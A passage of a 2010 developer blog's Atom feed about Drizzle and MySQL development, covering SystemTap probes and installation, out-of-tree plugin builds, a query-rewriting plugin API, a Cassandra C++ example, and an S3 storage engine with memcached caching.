$ sudo stap -l 'process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("*")'
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__write__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__write__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__read__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__read__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("connection__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("connection__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__parse__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__parse__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__update__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__update__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__select__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__select__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__delete__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__delete__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__exec__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__exec__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("command__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("command__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("select__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("select__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("filesort__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("filesort__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__rdlock__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__wrlock__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__unlock__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__rdlock__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__wrlock__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__unlock__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__cache__hit")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__cache__miss")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("read__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("read__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("index__read__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("index__read__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__block")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__hit")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__miss")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__write__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__write__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__write__block")
$
&lt;/pre&gt;

You can see that there are probes in MySQL which would not make sense for Drizzle such as probes
related to the query cache and keycache. In Drizzle, we are also starting to add probes around the
optimizer but it is slow going.

That's it for now. I'll probably write a brief post next week demonstrating using these probes in
MySQL and Drizzle. I'll be covering more in my presentation at the MySQL user's conference in a few
weeks.
</content>
 <feedburner:origLink>http://posulliv.github.com//2010/04/02/drizzle-mysql-stap.html</feedburner:origLink></entry>
 
 <entry>
   <title>Drizzle Accepted for GSoC 2010</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/YCzRraOVX6I/drizzle-soc.html" />
   <updated>2010-03-18T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2010/03/18/drizzle-soc</id>
   <content type="html">I just found out today that Drizzle was accepted as its own project for Google's Summer of Code this
year. Our organization is listed &lt;a
href="http://socghop.appspot.com/gsoc/org/show/google/gsoc2010/drizzle"&gt;here&lt;/a&gt;.&lt;br&gt; 

I'm acting as the program administrator for Drizzle this year with &lt;a href="http://oddments.org/"&gt;Eric Day&lt;/a&gt; and I'm real excited about it. Last
year, I myself was a &lt;a
href="http://posulliv.github.com/2009/04/21/google-summer-of-code.html"&gt;student in GSoC&lt;/a&gt; working on drizzle and I feel like I got a lot out of
that program so I really wanted to see Drizzle accepted as its own project this year. Hopefully,
we can get lots of students working with us this year.&lt;br&gt;

As someone who participated as a student and is now acting as a mentor, I can say that it is
probably the best summer job any student could get. Basically, you get paid to work on an
open-source project with awesome people and work from home. It can't really get much better if you
ask me.&lt;br&gt;

And any students interested in working on Drizzle should check out our ideas page on the &lt;a
href="http://drizzle.org/wiki/Soc"&gt;wiki&lt;/a&gt;. 

</content>
 <feedburner:origLink>http://posulliv.github.com//2010/03/18/drizzle-soc.html</feedburner:origLink></entry>
 
 <entry>
   <title>Out of Tree Plugins in Drizzle</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/9ordVJX3l8w/out-of-tree-plugin.html" />
   <updated>2010-03-10T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2010/03/10/out-of-tree-plugin</id>
   <content type="html">This week I've been working on porting the prototype MySQL storage engine developed at &lt;a
href="http://akibainc.com"&gt;Akiban&lt;/a&gt; to Drizzle. While doing this, I discovered that in Drizzle, it is
possible to build a plugin out of tree. When I say out of tree, I mean that I can develop a plugin
for drizzle and build it without having a copy of the drizzle source code. This is amazingly awesome
and is mostly due to the awesome build system that &lt;a href="http://inaugust.com/"&gt;Monty&lt;/a&gt; has put together.
This build system is called &lt;a href="https://launchpad.net/pandora-build"&gt;Pandora Build&lt;/a&gt; and if
you are ever working on a project that needs to use autoconf related tools, you should really check it out.
Its friggin awesome. It lets you concentrate on development instead of having to spend a bunch of
time trying to get a good build environment set up.&lt;br&gt;

Anyway, here I am going to go through an example of how to build a drizzle plugin out of tree. The
code is available at lp:~posulliv/drizzle/out-of-tree-example if anyone is interested in looking at
it. I am going to take an existing plugin in the drizzle source tree I developed and show how to
build it out of tree. The plugin I'm going to work with is the &lt;a
href="http://posulliv.github.com/2009/09/29/viewing-memcached-statistics-from-drizzle.html"&gt;memcached_stats&lt;/a&gt;
plugin.&lt;br&gt;

Before starting, its worth noting that Monty is working on creating a one-step tool for taking a
plugin that is currently in drizzle's source tree (that is, in the plugin directory of a drizzle
tree) and making it possible to build that plugin out of tree. His goal is that there need be no
changes in content between a directory that's in the drizzle source tree and one that's outside the
source tree.&lt;br&gt;

For this post, we will assume that we are working in a directory named mc-stats-plugin. Before
starting. this directory just contains source files. We will be adding all the build-related files
that are needed to build it.&lt;br&gt;

The first thing that is needed is a plugin.ini file for a plugin. For an out-of-tree plugin, a
name and url is required. Thus, the plugin.ini file for this plugin will look like:

&lt;pre&gt;
[plugin]
name=memcached_stats
title=Memcached Stats in DATA_DICTIONARY tables
description=Some DATA_DICTIONARY tables that provide Memcached stats
url=http://memcached.org/
version=0.1
disabled=yes
load_by_default=no
author=Padraig O Sullivan
license=PLUGIN_LICENSE_BSD
headers=stats_table.h analysis_table.h sysvar_holder.h
sources=memcached_stats.cc stats_table.cc analysis_table.cc
build_conditional="${ac_cv_libmemcached}" = "yes" -a "x${MEMCACHED_BINARY}" != "xno"
ldflags=${LTLIBMEMCACHED}
&lt;/pre&gt;

Once that's done, we need to create a config directory and copy a few files from drizzle's trunk:

&lt;pre&gt;
$ cp $DRIZZLE_SRC_ROOT/config/config.rpath ./config/.
$ cp $DRIZZLE_SRC_ROOT/config/pandora-plugin ./config/.
$ cp -R $DRIZZLE_SRC_PORT/m4 .
&lt;/pre&gt;

Like I said before, Monty is working on a tool that will automate the steps above. Now, we can
proceed and start compiling our plugin:

&lt;pre&gt;
$ ./config/pandora-plugin
$ autoreconf -i
libtoolize: putting auxiliary files in AC_CONFIG_AUX_DIR, `config'.
libtoolize: copying file `config/config.guess'
libtoolize: copying file `config/config.sub'
libtoolize: copying file `config/install-sh'
libtoolize: copying file `config/ltmain.sh'
libtoolize: putting macros in `m4'.
libtoolize: copying file `m4/libtool.m4'
libtoolize: copying file `m4/ltoptions.m4'
libtoolize: copying file `m4/ltsugar.m4'
libtoolize: copying file `m4/ltversion.m4'
libtoolize: copying file `m4/lt~obsolete.m4'
libtoolize: Remember to add `LT_INIT' to configure.ac.
libtoolize: Consider adding `AC_CONFIG_MACRO_DIR([m4])' to configure.ac and
libtoolize: rerunning libtoolize, to keep the correct libtool macros in-tree.
configure.ac:7: installing `config/compile'
configure.ac:7: installing `config/missing'
Makefile.am: installing `config/depcomp'
$ ./configure
...
$ make
make  all-am
make[1]: Entering directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
  CXX    libmemcached_stats_plugin_la-memcached_stats.lo
  CXX    libmemcached_stats_plugin_la-stats_table.lo
  CXX    libmemcached_stats_plugin_la-analysis_table.lo
  CXXLD  libmemcached_stats_plugin.la
make[1]: Leaving directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
$
&lt;/pre&gt;

Now, our plugin is built. To install it, we simply do a make install and give the
--plugin_add=memcached_stats option to drizzled when we start the server.&lt;br&gt;

I just think this process
makes my life a whole lot easier and I wanted to bring some attention to how easy drizzle makes
developing plugins.


</content>
 <feedburner:origLink>http://posulliv.github.com//2010/03/10/out-of-tree-plugin.html</feedburner:origLink></entry>
 
 <entry>
   <title>Schema-Free Drizzle!</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/9DW1UOLlcto/schema-free-drizzle.html" />
   <updated>2010-03-02T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2010/03/02/schema-free-drizzle</id>
   <content type="html">I came across this &lt;a href="http://www.igvita.com/2010/03/01/schema-free-mysql-vs-nosql/"&gt;post&lt;/a&gt; from 
&lt;a href="http://www.igvita.com"&gt;Ilya Grigorik&lt;/a&gt; on &lt;a href="http://news.ycombinator.com/"&gt;Hacker News&lt;/a&gt; 
yesterday and I figured I just had to implement this in Drizzle now with the new query rewriting
interface that I mentioned &lt;a href="http://posulliv.github.com/2010/03/01/query-rewrite.html"&gt;yesterday&lt;/a&gt;.
The awesome thing about Drizzle is that I can try all these ideas out easily by just implementing a
plugin.
&lt;br&gt;

Any SQL statements we want to use on our schema-free constructs, we have to prefix with the string
'nos'. With that said, here is a session demonstrating this query rewriting plugin:

&lt;pre&gt;
Your Drizzle connection id is 2
Server version: 7 Source distribution (schema-less)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle&gt; use test;
Database changed
drizzle&gt; nos create table widgets;
Query OK, 0 rows affected (0.06 sec)

drizzle&gt; nos insert into widgets (id,name) values ('a', 'apple');
Query OK, 1 row affected (0.19 sec)

drizzle&gt; nos insert into widgets (id,name,type) values ('b', 'blackberry', 'phone');
Query OK, 1 row affected (0.21 sec)

drizzle&gt; nos select * from widgets;
+------+------------+-------+
| id   | name       | type  |
+------+------------+-------+
| a    | apple      | NULL  | 
| b    | blackberry | phone | 
+------+------------+-------+
2 rows in set (0 sec)

drizzle&gt; nos select * from widgets where id = 'a';
+------+-------+------+
| id   | name  | type |
+------+-------+------+
| a    | apple | NULL | 
+------+-------+------+
1 row in set (0 sec)

drizzle&gt;
&lt;/pre&gt;
&lt;br&gt;

The code for this is available on Launchpad (lp:~posulliv/drizzle/schema-less). I threw this
together in a few hours today for fun so it is what it is. 

</content>
 <feedburner:origLink>http://posulliv.github.com//2010/03/02/schema-free-drizzle.html</feedburner:origLink></entry>
 
 <entry>
   <title>Query Rewriting Plugin Point for Drizzle</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/StLs8TZS62g/query-rewrite.html" />
   <updated>2010-03-01T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2010/03/01/query-rewrite</id>
   <content type="html">One of the first tasks in my new position at &lt;a href="http://akibainc.com"&gt;Akiban&lt;/a&gt; was to create
a plugin point within Drizzle for query rewriting.
&lt;br&gt;

The first decision to make was where to insert a plugin point for a query rewriter. The parsed
representation of a query would seem like a natural thing to pass to a query rewriter plugin since
the plugin would not have to implement its own parser then. However, the parsed representation of a
query in Drizzle is not the easiest in the world to deal with right now so passing this to a plugin
would make developing a rewriting plugin quite difficult. Thus, I made the decision to create the
plugin point before parsing occurs.
&lt;br&gt;

This means that if a
plugin developer wants to do some complex rewriting, they may need to parse the query in their
plugin. It may not be ideal but it does make the plugin API for query rewriting quite simple and opens
up a lot of interesting opportunities.
&lt;br&gt;

Following the lead of other plugin interfaces such as the replication API developed by &lt;a
href="http://jpipes.com"&gt;Jay&lt;/a&gt;, I wanted to keep it as simple and easy to understand as possible.
With that in mind, here is the entire API for a query rewriting plugin:&lt;br&gt;

&lt;script src="http://gist.github.com/301690.js"&gt;&lt;/script&gt;
&lt;br&gt;

Thus, all a plugin developer needs to do is implement the rewrite() function within their plugin.
The query is passed by reference as a std::string so a plugin can do whatever it likes to this
string and this string will then be passed to the parser in the Drizzle core kernel for parsing.
&lt;br&gt;

This interface opens up a lot of possibilties for interesting plugins. For example, one could
develop a plugin to analyze a query for common SQL injection patterns or develop a plugin to rewrite
a query based on a set of rules. I would be really interested in hearing other ideas people reading
this have for plugins using this interface?
&lt;br&gt;

</content>
 <feedburner:origLink>http://posulliv.github.com//2010/03/01/query-rewrite.html</feedburner:origLink></entry>
 
 <entry>
   <title>Installing SystemTap on Ubuntu</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/h8OthWQt6zU/installing-stap.html" />
   <updated>2010-02-26T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2010/02/26/installing-stap</id>
   <content type="html">I'm presenting at the MySQL user's conference this year and one of my &lt;a
href="http://en.oreilly.com/mysql2010/public/schedule/detail/12472"&gt;talks&lt;/a&gt; is on using SystemTap and DTrace
with MySQL and Drizzle. I'm also doing a tutorial with &lt;a href="http://jpipes.com"&gt;Jay Pipes&lt;/a&gt; on
developing replication plugins for Drizzle and that should be a lot of fun.
&lt;br&gt;

I wanted to write some posts before the conference that I can reference
within my talk which detail how to install &lt;a href="http://sourceware.org/systemtap/"&gt;SystemTap&lt;/a&gt; and configure Drizzle and MySQL for use with
SystemTap. Thus, this post is on how to install SystemTap on Ubuntu while my next post
will go in to details about how to configure MySQL and Drizzle for use with SystemTap.
&lt;br&gt;

Before starting, its worth noting that this post is specific to Ubuntu 9.10. The procedure to follow
may be different on other versions so its worth keeping that in my mind. The first thing we do is
install systemtap and some associated packages which will be needed by Drizzle and MySQL:

&lt;pre&gt;
$ sudo apt-get install systemtap
$ sudo apt-get install systemtap-sdt-dev
&lt;/pre&gt;

Now, being used to Ubuntu, you would think you are good to go now. Unfortunately, attempting to run
SystemTap will probably give you the following error:

&lt;pre&gt;
$ stap -e 'probe kernel.function("sys_open") {log("hello world") exit()}'
semantic error: libdwfl failure (missing x86_64 kernel/module debuginfo under
'/lib/modules/2.6.31-19-generic/build'): No such file or directory while resolving probe point
kernel.function("sys_open")
semantic error: no probes found
Pass 2: analysis failed.  Try again with another '--vp 01' option.
$
&lt;/pre&gt;

The above error occurs because SystemTap needs to have a debug version of the kernel available.
Unfortunately, installing the debug information for a kernel on ubuntu is not a trivial operation to
perform. In fact, there is a &lt;a
href="https://bugs.launchpad.net/ubuntu/+source/linux/+bug/289087"&gt;bug&lt;/a&gt; on Launchpad about this
issue. Thus, we will build a kernel debug package from source ourselves. This can be done as
follows:

&lt;pre&gt;
$ cd $HOME
$ sudo apt-get install dpkg-dev debhelper gawk
$ mkdir tmp
$ cd tmp
$ sudo apt-get build-dep --no-install-recommends linux-image-$(uname -r)
$ apt-get source linux-image-$(uname -r)
$ cd linux-2.6.31 (this is currently the kernel version of 9.10)
$ fakeroot debian/rules clean
$ AUTOBUILD=1 fakeroot debian/rules binary-generic skipdbg=false
$ sudo dpkg -i ../linux-image-debug-2.6.31-19-generic_2.6.31-19.56_amd64.ddeb
&lt;/pre&gt;

This builds a debug image of the kernel and so will take quite a while. Once we have the above
completed, we can try running our hello world example with SystemTap again. In order to get some
output, you should open or create some file on the system in another terminal window. In this
example, I backgrounded the stap process and created a file:

&lt;pre&gt;
$ sudo stap -e 'probe kernel.function("sys_open") {log("hello world") exit()}' &amp;
[1] 951
$ touch /tmp/padraig
$ hello world
$ [1]+ Done
&lt;/pre&gt;

Installing SystemTap on CentOS is significantly easier since it is primarily developed by Red Hat. A
good article on how to install it on CentOS is available &lt;a
href="http://sourceware.org/systemtap/wiki/SystemTapOnCentOS"&gt;here&lt;/a&gt;. 
&lt;br&gt;

In my next post on the topic, I'll explain how to configure MySQL and Drizzle for SystemTap and give
some simple examples of using SystemTap with them.
</content>
 <feedburner:origLink>http://posulliv.github.com//2010/02/26/installing-stap.html</feedburner:origLink></entry>
 
 <entry>
   <title>Using the C++ Interface with Cassandra</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/N-TMquwVWnU/cpp-cassandra.html" />
   <updated>2010-02-22T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2010/02/22/cpp-cassandra</id>
   <content type="html">Before starting, Cassandra needs to be downladed and installed. In a &lt;a
href="http://posulliv.github.com/2009/09/07/building-a-small-cassandra-cluster-for-testing-and-development.html"&gt;previous post&lt;/a&gt;, I
went through the steps involved in setting up a Cassandra cluster so I'm not going to repeat that
here. For this simple example though, I'll be using the following keyspace (which needs to be
present in the storage-conf.xml file):&lt;br&gt;

&lt;script src="http://gist.github.com/311823.js"&gt;&lt;/script&gt;
&lt;br&gt;

Once we have cassandra installed and running, we next need to download thrift from its &lt;a
href="http://incubator.apache.org/thrift/"&gt;Apache
homepage&lt;/a&gt;. I went with the latest stable release which at the
time of writing is 0.2.0. Installation from the tarball is pretty straightforward but ensure to run
ldconfig after installing thrift.&lt;br&gt;

Once thrift is installed, we need to generate the C++ interface for Cassandra (this will be done as
the cassandra user if following the setup in my previous post):

&lt;pre&gt;
$ cd $CASSANDRA_HOME/interface
$ thrift --gen cpp cassandra.thrift
$ ls -ltr
total 44
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 17:57 thrift
-rw-r--r-- 1 cassandra cassandra 21105 2010-02-22 17:57 cassandra.thrift
-rw-r--r-- 1 cassandra cassandra  3359 2010-02-22 17:57 cassandra.avpr
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 18:01 avro
drwxr-xr-x 2 cassandra cassandra  4096 2010-02-22 21:41 gen-cpp
$ mkdir cpp-test
&lt;/pre&gt;

Within the cpp-test directory, I'm going to create a file named simple-test.cc which looks like:&lt;br&gt;

&lt;script src="http://gist.github.com/311827.js"&gt;&lt;/script&gt;
&lt;br&gt;

To compile this, I used the following command line (assuming I am in the cpp-test directory):

&lt;pre&gt;
$ g++ -o cpptest -Wall -g \
&gt; -I../gen-cpp/. \
&gt; -I/usr/local/include/thrift \
&gt; -L/usr/local/lib -lstdc++ -lthrift \
&gt; simple-test.cc \
&gt; ../gen-cpp/cassandra_constants.cpp \
&gt; ../gen-cpp/cassandra_types.cpp \
&gt; ../gen-cpp/Cassandra.cpp
$
&lt;/pre&gt;

The above command will produce an executable named cpptest in the cpp-test directory. Assuming
cassandra is started, we run the binary and should obtain output like so:

&lt;pre&gt;
$ ./cpptest 
Column name retrieved is: second
Value in column retrieved is: this is data!!
$
&lt;/pre&gt;

That's a simple example of using the C++ interface to Cassandra. Hopefully, this will prove useful
to someone but it took me longer than expected to get the above simple test working so I figured it
was worth writing up the steps I went through.
</content>
 <feedburner:origLink>http://posulliv.github.com//2010/02/22/cpp-cassandra.html</feedburner:origLink></entry>
 
 <entry>
   <title>New Job at Akiban</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/mD2QRUB0bF0/new-job-at-akiban.html" />
   <updated>2010-02-06T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2010/02/06/new-job-at-akiban</id>
   <content type="html">I just finished my first week at my new position as a software engineer at &lt;a
href="http://akibainc.com/"&gt;Akiban Technologies&lt;/a&gt; in Boston.
&lt;br&gt;

I'm really excited about working here. Akiban is a small startup developing some really cool
technology that I believe will get people talking about the relational model in a good way again. We
are currently based in the South End of Boston. The building where we are located is pretty awesome
and not at all what I pictured an office to be like. There is a resident artist in the building who
hangs his paintings on the walls and they seem to move to different places at random times. Its a
strange feeling to walk in to work in the morning and smell fresh paint as I go to my desk.
Definitely not something I expected!
&lt;br&gt;

But besides all that, one of the best things for me about working here is that I get paid to
contribute to open source. I've been pretty involved with Drizzle for the last year while
still a student and it was always something I really enjoyed which I never thought someone would pay
me to work on. The community around the project is awesome and I was just happy to be involved with
it. Now that I get paid to contribute, it's nice to know that I can still be part of that community
without having to worry about how I'm going to make a living. It's weird to be paid for something
that I would still be doing anyway without the pay! I'm not complaining though, it's a nice change!
&lt;br&gt;

I'll be presenting at the MySQL conference in April, lots of awesome work is happening in the
Drizzle project and Akiban will be out of stealth mode by the conference so there are some exciting
times ahead!
</content>
 <feedburner:origLink>http://posulliv.github.com//2010/02/06/new-job-at-akiban.html</feedburner:origLink></entry>
 
 <entry>
   <title>Moved to GitHub Pages</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/k7kYtj-STz4/github-move.html" />
   <updated>2010-01-28T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2010/01/28/github-move</id>
   <content type="html">I decided to move my blog to a new hosting provider - &lt;a href="http://github.com/blog/272-github-pages"&gt;GitHub Pages&lt;/a&gt;. The blogging software used with GitHub is &lt;a href="http://github.com/mojombo/jekyll/tree/master"&gt;Jekyll&lt;/a&gt;.&lt;br&gt;

I really like the fact that everything is done via a &lt;a href="http://git-scm.com/"&gt;git&lt;/a&gt; repository. So far, I really like this setup.
</content>
 <feedburner:origLink>http://posulliv.github.com//2010/01/28/github-move.html</feedburner:origLink></entry>
 
 <entry>
   <title>S3 Storage Engine with Memcached in Drizzle</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/g01a2ebwZyY/s3-storage-engine-with-memcached-in-drizzle.html" />
   <updated>2009-11-09T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2009/11/09/s3-storage-engine-with-memcached-in-drizzle</id>
   <content type="html">Previously, I had ported Brian's &lt;a href="http://tangent.org/506/memcache_engine.html"&gt;memcached engine&lt;/a&gt; to Drizzle and rencently, I've been doing some work with Amazon's S3 for school. Thus, I decided to have a look at Mark's &lt;a href="http://fallenpegasus.com/code/mysql-awss3/"&gt;S3 storage engine&lt;/a&gt; for MySQL. Over the last 2 days, I created a new version of the S3 storage engine for Drizzle with the option to use &lt;a href="http://memcached.org/"&gt;Memcached&lt;/a&gt; as a write-through cache for the S3 backend store. I see this work more as showing the cool things we can do in Drizzle and how quickly we can get prototypes up and running. I don't even know if this is a good idea or anything but its cool to be able to store all data in S3.&lt;br&gt;

First, lets see how to create a table with this engine. The one constraint on tables created with this engine is that they need to have a primary key specified on the table. Each table that is created in this engine is represented as a bucket in S3. So whenever you create a table with this engine, you create a bucket in S3. So lets try creating a table:

&lt;pre&gt;
drizzle&gt; create database demo;
Query OK, 1 row affected (0 sec)

drizzle&gt; use demo;
Database changed
drizzle&gt; create table padara (
    -&gt; a int primary key,
    -&gt; b varchar(255),
    -&gt; c varchar(255)) engine=mcaws;
ERROR 1005 (HY000): Can't create table 'demo.padara' (errno: 1005)
drizzle&gt;
&lt;/pre&gt;

Lets get some more information on why that table creation failed:

&lt;pre&gt;
drizzle&gt; show warnings;
+-------+------+-------------------------------------------------------------------------------------+
| Level | Code | Message                                                                             |
+-------+------+-------------------------------------------------------------------------------------+
| Error | 1005 | Amazon S3 Connection Pool has not been created (Did you specify your credentials?)
 |
| Error | 1005 | Can't create table 'demo.padara' (errno: 1005)                                      |
+-------+------+-------------------------------------------------------------------------------------+
2 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

As you see, we need to specify our Amazon AWS access credentials before we can utilize this store engine. For the moment, I have the following system variables associated with this plugin:

&lt;pre&gt;
drizzle&gt; show variables like '%AWS%';
+-----------------------+-------+
| Variable_name         | Value |
+-----------------------+-------+
| mcaws_accesskey       |       |
| mcaws_mcservers       |       |
| mcaws_secretaccesskey |       |
+-----------------------+-------+
3 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

So I set the AWS access credentials by setting the appropriate system variables (this has to be done before tables can be created with this engine and in this order):

&lt;pre&gt;
drizzle&gt; set global mcaws_accesskey = 'YOUR_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle&gt; set global mcaws_secretaccesskey = 'YOUR_SECRET_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle&gt; show variables like '%AWS%';
+-----------------------+------------------------------------------+
| Variable_name         | Value                                    |
+-----------------------+------------------------------------------+
| mcaws_accesskey       | YOUR_ACCESS_KEY                     |
| mcaws_mcservers       |                                          |
| mcaws_secretaccesskey | YOUR_SECRET_ACCESS_KEY |
+-----------------------+------------------------------------------+
3 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

Before creating the table, lets look at what buckets are associated with my S3 account. I'm going to use the &lt;a href="http://www.s3fox.net/"&gt;S3Fox&lt;/a&gt; firefox plugin for this (there is multiple other things you could use). Here are the buckets in my S3 account right now:&lt;br&gt;

&lt;img class="aligncenter size-medium" src="../../../images/s3fox.png" alt="" width="300" height="270" /&gt;&lt;br&gt;

I just have the one bucket for now. Now, I create a table using the S3 engine after specifying my AWS credentials:

&lt;pre&gt;
drizzle&gt; create table padara (
    -&gt; a int primary key,
    -&gt; b varchar(255),
    -&gt; c varchar(255)) engine=mcaws;
Query OK, 0 rows affected (0.31 sec)

drizzle&gt;
&lt;/pre&gt;

and when I look at my buckets in S3, I should see a new bucket representing the new table I created:&lt;br&gt;

&lt;img class="aligncenter size-medium" src="../../../images/s3foxafter.png" alt="" width="300" height="270" /&gt;&lt;br&gt;

As can be seen, the bucket name is the database name concatenated with the table name - 'databasetable'. Next, lets insert some rows in the table and then see what objects are in the bucket:

&lt;pre&gt;
drizzle&gt; insert into padara
    -&gt; values (1, 'padraig', 'sullivan');
Query OK, 1 row affected (0.07 sec)

drizzle&gt; insert into padara
    -&gt; values (2, 'domhnall', 'sullivan');
Query OK, 1 row affected (0.08 sec)

drizzle&gt; insert into padara
    -&gt; values (3, 'tomas', 'sullivan');
Query OK, 1 row affected (0.14 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;img class="aligncenter size-medium" src="../../../images/s3foxobjects.png" alt="" width="300" height="270" /&gt;&lt;br&gt;

Now we can query the table. Queries on the table need to specify a primary key value in the WHERE clause for now so we will just be returning one row (I'll be looking into range queries pretty soon):

&lt;pre&gt;
drizzle&gt; select *
    -&gt; from padara
    -&gt; where a = 2;
+---+----------+----------+
| a | b        | c        |
+---+----------+----------+
| 2 | domhnall | sullivan |
+---+----------+----------+
1 row in set (5 sec)

drizzle&gt;
&lt;/pre&gt;

That's basically the simple S3 engine. It works just like a regular storage engine except the data is stored on S3. Of course, the latency involved in interacting with S3 for every request can be quite limiting. For example, the simple query above took 5 seconds to retrieve the data. Thus, I added support for using memcached as a write-through cache for this engine. All we need to do is specify the memcached servers to use in the appropriate system variable:

&lt;pre&gt;
drizzle&gt; set global mcaws_mcservers = 'localhost:19191';
Query OK, 0 rows affected (0 sec)

drizzle&gt;
&lt;/pre&gt;

Now, whenever we query a table created in this engine, we will check for the data in memcached first and if we miss in the cache, only then do we go to S3 for the data. When inserting new data, we insert it in both memcached and S3. Using memcached for this engine is totally optional. It can simply be used as a way to store data in S3 through the engine interface but I thought it might prove to be a useful option for an engine like this.&lt;br&gt;

I wanted to show how clean the code to implement the functionality to do this in the plugin is. This goes to show the benefit of the great build system Monty Taylor has put a lot of work in to in Drizzle. I can easily utilize external libraries in my plugin - in this case &lt;a href="https://launchpad.net/libmemcached"&gt;libmemcached&lt;/a&gt; and &lt;a href="http://aws.28msec.com/"&gt;libaws&lt;/a&gt;. The code below first checks for data in memcached and if it is not present there, retrieves the data from S3 and updates memcached before returning to the engine.&lt;br&gt;

&lt;script src="http://gist.github.com/230509.js"&gt;&lt;/script&gt;
&lt;br&gt;

So thats about it for now. In the future, there are a few things I plan on working on for this engine:
&lt;ul&gt;
	&lt;li&gt;removing the need to have a table represented as a bucket in S3 (this design makes the code much simpler for now)&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
	&lt;li&gt; increasing the size of the objects transferred from/to S3 - make the unit of transfer between the engine a page instead of a row as it is now&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
